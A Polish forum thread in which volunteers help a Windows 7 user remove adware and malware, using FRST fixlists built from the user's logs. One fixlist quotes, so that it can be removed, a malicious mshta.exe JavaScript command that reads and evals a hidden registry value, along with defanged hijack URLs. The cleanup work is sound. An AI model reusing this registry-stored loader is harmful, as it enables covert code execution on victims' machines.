Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

- Windows 7 - regsvr32 nie można załadować modułu.

Pi00tr3k 23 Sty 2017 01:43 774 7
  • #1 23 Sty 2017 01:43
    Pi00tr3k
    Poziom 8  

    Witam. Wyświetla mi się taki komunikat przy starcie systemu.
    - Windows 7 - regsvr32 nie można załadować modułu.9036901100...640912.jpg Download (37.48 kB)
    Widziałem, że są takie tematy, jednakże wydaje mi się, że dla każdego PC ten naprawiający plik do FRST jest inny, a sam nie umiem takiego zrobić. Jeśli się mylę, wyprowadźcie mnie, proszę z błędu, to może nauczę się sam! :)
    Z góry bardzo dziękuję za pomoc i pozdrawiam.
    Załączam logi.

    0 7
  • #2 23 Sty 2017 04:39
    krzychupar
    Poziom 40  

    Odinstaluj:
    SnapDo (HKLM-x32\...\{ED839592-3BA6-4249-84AA-8D052A63DF0E}) (Version: 1.0.0.0 - Resoft) <==== ATTENTION
    trotux - Uninstall (HKLM-x32\...\{D555F651-12FE-42E3-9EF1-4BCA64FA0373}) (Version: - ) <==== ATTENTION

    Otwórz notatnik systemowy i wklej:
    Task: {851B9E6C-6A80-4E81-82BA-6ADB716C6CF5} - \SessionAgent -> No File <==== ATTENTION
    Task: {8BA66152-DE18-43C8-B9F1-DCC4F8ECD90A} - \Kerpitghopuent Collector -> No File <==== ATTENTION
    Task: {C41983BE-8830-4633-828F-2C17B2D513A3} - \{E66A55F1-FFAB-434C-B1C7-5E9C021DCA13} -> No File <==== ATTENTION
    Task: {E03880CD-78F5-4E63-8379-D957418BFE35} - \SidebarExecute -> No File <==== ATTENTION
    Task: {E56FF24F-6208-49B7-8F99-3EF0E18D2915} - \Host Process for Windows Services -> No File <==== ATTENTION
    WMI_ActiveScriptEventConsumer_ASEC: <===== ATTENTION
    Hosts:
    HKLM\...\RunOnce: [OMEWPRODUCT_V79DF] => C:\Users\Pi00tr3k\AppData\Local\Temp\SEXRMQFUJ7.exe [141824 2017-01-23] (9HC) <===== ATTENTION
    HKLM\...\RunOnce: [OMEWPRODUCT_M2S0M] => C:\Users\Pi00tr3k\AppData\Local\Temp\NWDCBLETTG.exe [141824 2017-01-23] (9HC) <===== ATTENTION
    HKLM\...\RunOnce: [OMEWPRODUCT_DYANU] => C:\Users\Pi00tr3k\AppData\Local\Temp\3S0WS0HB1A.exe [141824 2017-01-23] (9HC) <===== ATTENTION
    HKU\S-1-5-21-2525762015-2725681859-1576018476-1000\...\Run: [Edbltion] => regsvr32.exe C:\Users\Pi00tr3k\AppData\Local\Edbltion\twainobjType.dll <===== ATTENTION
    HKU\S-1-5-21-2525762015-2725681859-1576018476-1000\...\MountPoints2: {164ea9c5-3bcc-11e6-9a68-806e6f6e6963} - D:\autorun.exe
    HKU\S-1-5-18\...\Run: [Q0FFiwdn9d.exe] => C:\Windows\TEMP\{ba7-3e-4c-0f496-94293-dd3f-0ec91}\Q0FFiwdn9d.exe [1171968 2017-01-23] () <===== ATTENTION
    ShellExecuteHooks: No Name - {ABE212B8-DE3B-11E6-B30F-64006A5CFC23} - C:\Users\Pi00tr3k\AppData\Roaming\Gragers\Thuvetfebugh.dll -> No File
    ShellIconOverlayIdentifiers: [KzShlobj] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} => C:\Program Files\żěŃą\X64\KZipShell.dll [2017-01-23] ()
    HKU\S-1-5-21-2525762015-2725681859-1576018476-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...2Zcqvak_LL72VfgVE2kN8a06xdAf-2qMA0xXDf&q={searchTerms}
    HKU\S-1-5-21-2525762015-2725681859-1576018476-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%73%6E%61%70%64%6F.%63%6...nklUr9UfXUh_NWS2AkXk5axcV1eIrk3ABYvx1-o0VyGGS




    SearchScopes: HKLM-x32 -> DefaultScope value is missing
    CHR Profile: C:\Users\Pi00tr3k\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-01-23] <==== ATTENTION
    R3 EasyAntiCheatSys; \??\C:\Windows\system32\drivers\EasyAntiCheat.sys [X]
    S3 VGPU; System32\drivers\rdvgkmd.sys [X]
    2017-01-23 01:23 - 2017-01-23 01:33 - 00000000 ____D C:\AdwCleaner
    2017-01-23 00:49 - 2017-01-23 00:49 - 00000000 ____D C:\Users\Pi00tr3k\AppData\Local\UCBrowser
    2017-01-23 00:23 - 2017-01-23 01:16 - 00000000 ____D C:\Program Files\żěŃą
    2017-01-23 00:21 - 2017-01-23 01:20 - 00000000 ____D C:\Program Files (x86)\Kerpitghopuent Collector
    2017-01-23 00:21 - 2017-01-23 00:49 - 00000000 ____D C:\Users\Pi00tr3k\AppData\Local\Edbltion
    2017-01-23 00:21 - 2017-01-23 00:24 - 00000000 ____D C:\Users\Pi00tr3k\AppData\Local\Uvwzmedia
    2017-01-23 00:41 - 2017-01-23 00:41 - 0023622 _____ () C:\Users\Pi00tr3k\AppData\Roaming\aliexpress.ico
    2017-01-23 00:41 - 2017-01-23 00:41 - 0099678 _____ () C:\Users\Pi00tr3k\AppData\Roaming\booking.ico
    2016-12-27 03:21 - 2016-12-27 03:21 - 0004608 _____ () C:\Users\Pi00tr3k\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
    2017-01-21 17:33 - 2017-01-21 17:33 - 0000000 ___SH () C:\Users\Pi00tr3k\AppData\Local\LumaEmu
    2016-07-19 22:41 - 2016-07-20 02:38 - 0029696 _____ () C:\Users\Pi00tr3k\AppData\Local\Tempunpacker.exe
    2017-01-10 17:54 - 2016-11-23 14:37 - 0000570 _____ () C:\Users\Pi00tr3k\AppData\Local\TroubleshooterConfig.json
    2016-07-20 02:40 - 2016-07-20 02:40 - 0000000 _____ () C:\Users\Pi00tr3k\AppData\Local\{26D2C0A0-3AEE-4A27-A114-C36FF5C15D7B}
    2016-11-20 00:42 - 2016-11-20 00:42 - 0000016 _____ () C:\ProgramData\mntemp
    2017-01-23 00:21 - 2017-01-23 00:21 - 00000000 ____D C:\ProgramData\Avira
    2017-01-23 00:21 - 2017-01-23 00:21 - 00000000 ____D C:\ProgramData\Avg
    C:\Users\Pi00tr3k\AppData\Local\Temp\SEXRMQFUJ7.exe
    C:\Users\Pi00tr3k\AppData\Local\Temp\NWDCBLETTG.exe
    C:\Users\Pi00tr3k\AppData\Local\Temp\3S0WS0HB1A.exe
    C:\Windows\TEMP\{ba7-3e-4c-0f496-94293-dd3f-0ec91}\Q0FFiwdn9d.exe
    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze.
    Uruchom FRST i kliknij w Fix/Napraw.

    0
  • #3 23 Sty 2017 09:42
    Kolobos
    Spec od komputerów

    Po wykonaniu zamiesc nowe logi z FRST, ze skanowania.

    0
  • #4 23 Sty 2017 16:23
    Pi00tr3k
    Poziom 8  

    krzychupar napisał:
    Odinstaluj:
    SnapDo (HKLM-x32\...\{ED839592-3BA6-4249-84AA-8D052A63DF0E}) (Version: 1.0.0.0 - Resoft) <==== ATTENTION
    trotux - Uninstall (HKLM-x32\...\{D555F651-12FE-42E3-9EF1-4BCA64FA0373}) (Version: - ) <==== ATTENTION


    Niekoniecznie rozumiem tę część. Mam to usunąć także za pomocą FRST? Jeśli tak, to w jaki sposób? Próbowałem CCleanerem i nie chce się usunąć. Teraz po restarcie PC, błąd jest taki:
    - Windows 7 - regsvr32 nie można załadować modułu.
    Widzę, że zmieniła się trochę jego treść, a dokładnie nazwa pliku. W załączniku daję wszystko, co wyskoczyło w FRST po fixie i skanowaniu.

    0
  • #5 23 Sty 2017 17:10
    krzychupar
    Poziom 40  

    W Programy i funkcje w Panelu sterowania patrzyłeś czy są. Przeskanuj komputer Malwarebytes Anti-Malware z tej strony https://ninite.com/malwarebytes/ i usuń to co wykryje.

    0
  • #6 23 Sty 2017 18:34
    Kolobos
    Spec od komputerów

    Odinstaluj:
    Adobe Reader 9, zmien na najnowsza wersje AR lub na Foxit: http://ninite.com/foxit/
    SnapDo
    trotux - Uninstall

    Dla bezpieczenstwa zgraj zakladki z Chrome.

    W ustawieniach Chrome zmien profil na Default, drugi utworzony przez infekcje ChromeDefaultData usun.

    Obok frst.exe utworz plik Fixlist.txt z zawartoscia:
    ShortcutWithArgument: C:\Users\Pi00tr3k\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikacje Chrome\Etui na telefon + SZKŁO do UMI Rome X.._.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=cjliepjbfphdmclnjginpanameinkcho
    ShortcutWithArgument: C:\Users\Pi00tr3k\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=ChromeDefaultData
    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://fanli90.cn/
    HKU\.DEFAULT\Software\Classes\2de16c: "C:\Windows\system32\mshta.exe" "javascript:J8co0yyL="8V3aTK0";k3i=new ActiveXObject("WScript.Shell");g7bSof="T92";b37DMD=k3i.RegRead("HKCU\\software\\qlkgnhltql\\yyaru");K4Rh6U="aoX";eval(b37DMD);T4R2zQK="I1s";" <===== ATTENTION
    HKU\S-1-5-21-2525762015-2725681859-1576018476-1000\...\Run: [Imhwsoft] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\Pi00tr3k\AppData\Local\Uvwzmedia\icfgAgenClock32.dll
    HKLM\...\Providers\hulrnq1e: C:\Program Files (x86)\Kerpitghopuent Collector\local64spl.dll
    CHR DefaultProfile: ChromeDefaultData
    CHR Profile: C:\Users\Pi00tr3k\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-01-23] <==== ATTENTION
    C:\Users\Pi00tr3k\AppData\Local\Google\Chrome\User Data\ChromeDefaultData
    2017-01-23 01:14 - 2017-01-23 01:14 - 00000000 ____D C:\Users\Pi00tr3k\AppData\Roaming\KZMount
    2017-01-23 00:41 - 2017-01-23 00:41 - 00000000 ____D C:\Users\Pi00tr3k\AppData\Local\Prolick
    2017-01-23 00:40 - 2017-01-23 01:26 - 00000000 ____D C:\Users\Pi00tr3k\AppData\Roaming\Gragers

    Po wykonaniu zamiesc nowe logi z FRST, ze skanowania.

    0
  • #7 23 Sty 2017 20:21
    Pi00tr3k
    Poziom 8  

    Dobra. Sprawa wygląda tak. Komunikat się już nie pokazuje. Dziękuję bardzo wszystkim za pomoc i mam nadzieję, że to już wszystko.
    Przeskanowałem tym Malwarebytes Anti-Malware komputer, wyszło mi bodajże 16 zagrożeń.
    "SnapDo" i "Trotux - Uninstall" w/w program sam wyrzucił. Zrobiłem reinstall Chrome'a, bo ten dalej dziwnie się zachowywał (ustawiał mi jakies podejrzane strony startowe itd).
    Zakładki niestety straciłem, ale cóż, za głupotę się płaci.
    Co do FRST, logi w załączniku, jak zwykle.
    Jeszcze raz bardzo dziękuję Wam za pomoc. Nie wiem skąd to cholerstwo się wzięło, mam antyvira i staram się dbać o komputer.
    Mam jeszcze jedno pytanie, zastanawiam się, dlaczego @Kolobos napisałeś, że mam usunąć Adobe Reader'a. Oczywiście zrobiłem to, ale jestem ciekawy, co tak powszechnie używany program (a nie żaden podejrzany) mógł mieć z tym wspólnego.
    Pozdrawiam wszystkich!

    0
  • #8 23 Sty 2017 22:08
    Kolobos
    Spec od komputerów

    Ta wersja Adobe Reader jest przestarzala i dziurawa, umozliwia przejecie kontroli nad komputerem po uruchomieniu szkodliwego pliku pdf. To w polaczeniu z automatycznym otwieraniem pdfow przez przegladarke powoduje zainfekowanie po wejsciu na spreparowana strone.


    W ktalogu C:\FRST masz wszystko co zostalo usuniete, sa tam tez zakladki, mozesz je "wygrzebac".

    Po wszystkim usun katalog C:\FRST i to wszystko.

    0